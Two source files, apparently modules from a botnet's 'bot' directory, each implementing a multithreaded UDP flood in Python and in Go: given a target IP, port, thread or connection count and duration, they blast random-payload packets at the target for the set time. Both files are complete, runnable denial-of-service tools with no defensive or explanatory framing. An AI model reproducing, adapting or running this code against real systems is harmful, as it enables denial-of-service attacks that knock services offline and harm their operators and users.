File: bot/udp.py
import socket
import threading
import time
import sys
import random

def generate_random_string(length):
    letter_bytes = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    return ''.join(random.choice(letter_bytes) for _ in range(length))

def udp_flood(target_ip, target_port, payload, duration):
    udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    timeout = duration / 1
    end_time = time.time() + timeout
    while time.time() < end_time:
        udp_socket.sendto(payload, (target_ip, target_port))
    udp_socket.close()

def main():
    if len(sys.argv) != 5:
        print("Usage: python udp.py <target_ip> <target_port> <num_threads> <duration>")
        sys.exit(1)

    target_ip = sys.argv[1]
    target_port = int(sys.argv[2])
    num_threads = int(sys.argv[3])
    duration = int(sys.argv[4])
    payload = generate_random_string(1024).encode()

    threads = []
    for _ in range(num_threads):
        thread = threading.Thread(target=udp_flood, args=(target_ip, target_port, payload, duration))
        thread.start()
        threads.append(thread)

    for thread in threads:
        thread.join()

if __name__ == "__main__":
    main()

File: bot/udp.go
package main

import (
	"math/rand"
	"net"
	"os"
	"strconv"
	"sync"
	"time"
)

const letterBytes = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

func main() {
	if len(os.Args) != 6 {
		println("Usage: go run udp.go <ip> <port> <connections> <time> <packet_length>")
		os.Exit(1)
	}

	targetIP := os.Args[1]
	targetPort, err := strconv.Atoi(os.Args[2])
	if err != nil {
		println("Invalid port number:", err)
		os.Exit(1)
	}

	numConnections, err := strconv.Atoi(os.Args[3])
	if err != nil {
		println("Invalid number of connections:", err)
		os.Exit(1)
	}

	duration, err := strconv.Atoi(os.Args[4])
	if err != nil {
		println("Invalid duration:", err)
		os.Exit(1)
	}

	packetLength, err := strconv.Atoi(os.Args[5])
	if err != nil {
		println("Invalid packet length:", err)
		os.Exit(1)
	}

	addr := net.JoinHostPort(targetIP, strconv.Itoa(targetPort))

	var wg sync.WaitGroup
	for i := 0; i < numConnections; i++ {
		wg.Add(1)
		go sendUDPPackets(&wg, addr, duration, packetLength)
	}

	wg.Wait()
}

func sendUDPPackets(wg *sync.WaitGroup, addr string, duration, packetLength int) {
	defer wg.Done()

	udpPayload := generateRandomString(packetLength)

	timeout := time.Duration(duration) * time.Second
	endTime := time.Now().Add(timeout)

	conn, err := net.Dial("udp", addr)
	if err != nil {
		return
	}
	defer conn.Close()

	startTime := time.Now()
	for time.Now().Before(endTime) {
		_, err := conn.Write([]byte(udpPayload))
		if err != nil {
			continue
		}
	}

	time.Sleep(endTime.Sub(startTime))
}

func generateRandomString(length int) string {
	rand.Seed(time.Now().UnixNano())
	b := make([]byte, length)
	for i := range b {
		b[i] = letterBytes[rand.Intn(len(letterBytes))]
	}
	return string(b)
}
